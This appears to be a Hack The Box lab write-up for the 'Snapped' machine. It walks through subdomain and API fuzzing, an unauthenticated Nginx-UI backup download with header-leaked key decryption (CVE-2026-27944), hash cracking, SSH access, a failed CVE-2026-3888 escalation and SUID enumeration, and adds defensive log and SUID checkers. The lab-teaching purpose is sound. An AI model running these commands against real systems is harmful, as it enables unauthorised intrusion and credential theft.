Tags: Vhost Fuzzing, Pivoting

🪶 HTB Snapped — Solution Notes

Platform: Hack The Box

Machine: Snapped

OS: Linux (Ubuntu 24.04)

Difficulty: Hard

Date: April 1, 2026

CVEs: CVE-2026-27944, CVE-2026-3888 (Attempted)


πŸ—ΊοΈ Attack Chain

Nmap Scan → Subdomain Fuzz (ffuf) → API Fuzz (/api/backup) → CVE-2026-27944 → Backup Decryption → Hashcat → SSH (jonathan) → Privilege Escalation Attempt (CVE-2026-3888 - FAILED) → Manual SUID Enum → Target Found: vmware-user-suid-wrapper → PROCESS STOPPED


🧠 How Does a Hacker Think? — Before You Begin

The initial mindset for any box is enumeration. What services are running? What are their versions? Is there a web server? Does it use virtual hosts? The first goal is to map the entire attack surface. An Nmap scan is the first step, followed by web enumeration to find hidden directories or, more importantly, subdomains where administrative interfaces might live.

1️⃣ Reconnaissance

Port Scanning

An Nmap scan revealed two open ports: SSH (22) and HTTP (80) running nginx on Ubuntu.

Bash

nmap -sCV 10.129.239.59

Findings:

/etc/hosts Setup

💡 Why Does /etc/hosts Matter?

Bash

echo "10.129.239.59 snapped.htb" | sudo tee -a /etc/hosts

Web & Service Discovery

Fuzzing for subdomains is critical. A standard wordlist fuzz failed, but switching to virtual host fuzzing revealed a key subdomain.

Bash

ffuf -w <wordlist> -u http://snapped.htb -H "Host: FUZZ.snapped.htb" -ic -ac

Result: admin.snapped.htb was discovered. After adding this to /etc/hosts as well, we found an Nginx-UI login page. The next step was to fuzz for API endpoints under /api/.

Bash

ffuf -w <wordlist> -u http://admin.snapped.htb/api/FUZZ -ic -ac

Result: The /api/backup endpoint returned a 200 OK status, while others returned 403 Forbidden. This was our entry point.
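The two recon signals above (one client cycling through many Host values, then a 200 on /api/backup sent without credentials) are easy to spot server-side. Added example, not from the write-up: a small checker over constructed nginx access-log lines, assuming a log_format that records $remote_addr, $host, $request, $status and $http_authorization in that order.

```python
"""Flag vhost fuzzing and unauthenticated backup downloads in nginx logs.
Added example; the log_format and sample lines are assumptions, not real
traffic from the box."""
import re
from collections import defaultdict

# Assumed log_format: '$remote_addr "$host" "$request" $status "$http_authorization"'
LINE_RE = re.compile(r'^(\S+) "([^"]*)" "(\S+) (\S+) [^"]*" (\d{3}) "([^"]*)"$')

# Constructed sample lines mirroring the ffuf phases in the write-up.
SAMPLE_LOG = """\
10.10.14.5 "dev.snapped.htb" "GET / HTTP/1.1" 404 ""
10.10.14.5 "mail.snapped.htb" "GET / HTTP/1.1" 404 ""
10.10.14.5 "test.snapped.htb" "GET / HTTP/1.1" 404 ""
10.10.14.5 "admin.snapped.htb" "GET / HTTP/1.1" 200 ""
10.10.14.5 "admin.snapped.htb" "GET /api/settings HTTP/1.1" 403 ""
10.10.14.5 "admin.snapped.htb" "GET /api/backup HTTP/1.1" 200 ""
192.168.1.20 "snapped.htb" "GET /index.html HTTP/1.1" 200 ""
"""


def parse(log_text):
    """Yield one dict per well-formed line; malformed lines are skipped."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ip, host, method, path, status, auth = m.groups()
            yield {"ip": ip, "host": host, "method": method, "path": path,
                   "status": int(status), "auth": auth}


def vhost_fuzzers(log_text, threshold=3):
    """Clients that sent requests for at least `threshold` distinct Host values."""
    hosts = defaultdict(set)
    for r in parse(log_text):
        hosts[r["ip"]].add(r["host"])
    return {ip for ip, seen in hosts.items() if len(seen) >= threshold}


def unauth_backup_hits(log_text):
    """(client, vhost) pairs for 200 responses on /api/backup with no Authorization."""
    return [(r["ip"], r["host"]) for r in parse(log_text)
            if r["path"].startswith("/api/backup") and r["status"] == 200
            and not r["auth"]]
```

On a real deployment the same two checks belong in whatever ships nginx logs to the SIEM; a 200 on /api/backup without a bearer token is the event that should never occur once the instance is patched.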


🧠 How Does a Hacker Think? — After Finding /api/backup

Discovering an unauthenticated backup endpoint on an admin panel is a jackpot. The immediate thought is: this must be a known vulnerability. A quick search for "Nginx-UI unauthenticated backup" would lead directly to CVE-2026-27944. The mindset shifts from broad discovery to targeted exploitation of a specific flaw. The new questions are: How is the backup encrypted? Is the key leaked? The curl -v response headers become the next target.

2️⃣ Initial Access — CVE-2026-27944 (Unauthenticated Nginx-UI Backup)

💡 What is CVE-2026-27944?

Step 1: Download Backup & Get Key

Bash

curl -OJ -v http://admin.snapped.htb/api/backup

The key and IV were extracted from the X-Backup-Security header in the verbose output.

Step 2: Process Key

The base64 key and IV were converted to hex for openssl.

Bash

key=$(echo '<KEY_B64>' | base64 -d | xxd -p -c 256)
iv=$(echo '<IV_B64>' | base64 -d | xxd -p -c 256)

Step 3: Decrypt Backup

The downloaded .zip file was a container. We first unzipped it to get the real target: nginx-ui.zip. Then, we decrypted it.

Bash

unzip backup-*.zip
openssl enc -aes-256-cbc -d -in nginx-ui.zip -out decrypted.zip -K $key -iv $iv

Step 4: Extract Hashes

Inside the decrypted zip was database.db. We used sqlite3 to dump the users table.

Bash

sqlite3 database.db "select * from users;"

Step 5: Crack Password & SSH Access

The bcrypt hash for the user jonathan was extracted and cracked using hashcat and the rockyou.txt wordlist.

Bash

hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt # Result: linkinpark

Bash

ssh jonathan@10.129.239.59 # Password: linkinpark


🚩 User Flag

Bash

cat /home/jonathan/user.txt


3️⃣ Privilege Escalation — A Tale of Two Attempts

Attempt 1: CVE-2026-3888 (FAILED)

💡 What is CVE-2026-3888?

Process & Root Cause of Failure:

  1. The exploit code from the official walkthrough was obtained.
  2. Since gcc was not on the target, the code was compiled on a Kali machine and transferred to the target via a Python HTTP server.
  3. The multi-terminal exploit was initiated, but failed repeatedly.
  4. Analysis: The snap-confine process on this specific machine never entered the "mimic directory" creation phase. The trigger string (dir:"/tmp/.snap/usr/lib/...") our exploit was waiting for never appeared in the DEBUG logs. The process would instead error out with getcwd() failed: No such file or directory. This indicated a subtle environmental difference from the machine used in the walkthrough, rendering the public exploit ineffective.

Attempt 2: Manual SUID Enumeration (PIVOT)

🧠 How Does a Hacker Think? — The Pivot

Step 1: Search for SUID Binaries

Bash

find / -perm -u=s -type f 2>/dev/null

Step 2: Analyze the Output

The list contained many standard binaries, but one stood out: /usr/bin/vmware-user-suid-wrapper. This binary is non-standard, from a third-party application (VMware Tools), and has "suid-wrapper" in its name, making it a prime candidate for misconfiguration or vulnerability.

Step 3: Exfiltration for Offline Analysis

An attempt to use strings on the target failed as it wasn't installed. The binary was then copied to the Kali machine using scp for local, offline analysis.
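A follow-up to Step 2 that is not part of the write-up: on a dpkg-managed system (the box is Ubuntu) the paths returned by the find command can be triaged against the package manifests, separating SUID files that no package ships from shipped files whose contents changed after install. The md5sums layout under /var/lib/dpkg/info is real; the demo() root, package name and file contents are constructed.

```python
"""Triage SUID binaries against dpkg manifests. Added example; the demo
root is constructed and the package 'demo-pkg' is fictitious."""
import glob
import hashlib
import os
import tempfile


def load_dpkg_md5sums(info_dir):
    """Map '/abs/path' -> (package, md5) from dpkg's <pkg>.md5sums files,
    whose entries are '<md5>  <path relative to />'."""
    table = {}
    for f in glob.glob(os.path.join(info_dir, "*.md5sums")):
        pkg = os.path.basename(f)[: -len(".md5sums")]
        with open(f, encoding="utf-8", errors="replace") as fh:
            for line in fh:
                parts = line.split(None, 1)
                if len(parts) == 2:
                    table["/" + parts[1].strip()] = (pkg, parts[0])
    return table


def triage_suid(paths, table, root="/"):
    """'unowned': no package ships the file; 'modified': shipped but its
    contents changed since install; 'intact': matches the package manifest."""
    verdict = {}
    for p in paths:
        entry = table.get("/" + os.path.relpath(p, root))
        if entry is None:
            verdict[p] = "unowned"
        else:
            with open(p, "rb") as fh:
                digest = hashlib.md5(fh.read()).hexdigest()
            verdict[p] = "intact" if digest == entry[1] else "modified"
    return verdict


def demo():
    """Constructed root: two files shipped by a fake package (one tampered
    after install) plus one file that no package ships."""
    root = tempfile.mkdtemp()
    info, bindir = (os.path.join(root, d) for d in ("var/lib/dpkg/info", "usr/bin"))
    os.makedirs(info); os.makedirs(bindir)
    shipped = {"passwd": b"original passwd", "vmware-user-suid-wrapper": b"vendor build"}
    with open(os.path.join(info, "demo-pkg.md5sums"), "w") as mf:
        for name, data in shipped.items():
            with open(os.path.join(bindir, name), "wb") as fh:
                fh.write(data)
            mf.write(f"{hashlib.md5(data).hexdigest()}  usr/bin/{name}\n")
    with open(os.path.join(bindir, "passwd"), "wb") as fh:  # tampered post-install
        fh.write(b"trojaned passwd")
    with open(os.path.join(bindir, "dropped-helper"), "wb") as fh:  # no package
        fh.write(b"unknown origin")
    names = ("passwd", "vmware-user-suid-wrapper", "dropped-helper")
    verdict = triage_suid([os.path.join(bindir, n) for n in names],
                          load_dpkg_md5sums(info), root)
    return {os.path.basename(p): v for p, v in verdict.items()}
```

On a live host, feed the output of the find command from Step 1 to triage_suid with the default root and info_dir; "unowned" and "modified" entries are the ones to inspect first, while an "intact" third-party wrapper still warrants reading its vendor's documentation for why it needs setuid.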


🚩 Root Flag

Root access was not achieved. The process was halted after identifying a new, promising privilege escalation vector (vmware-user-suid-wrapper) that required further offline analysis. This represents a realistic scenario where the initial attack path is blocked and a new one must be researched.

📚 Concepts Learned


🔑 General Hacker Mindset Summary

  1. Enumerate, Then Enumerate More: The attack surface is often larger than it first appears. Find all ports, subdomains, and API endpoints.
  2. If an Exploit Fails, Understand Why: We didn't just say "it didn't work." We analyzed the debug logs to see that the expected behavior (mimic creation) was not happening. This confirmed the exploit was incompatible, not that we used it wrong.
  3. The Path of Least Resistance: When the high-tech CVE exploit failed, we pivoted to a classic, fundamental technique (SUID hunting) which revealed a much simpler-looking (though unconfirmed) path to root. Always be ready to abandon a complex path for a simpler one.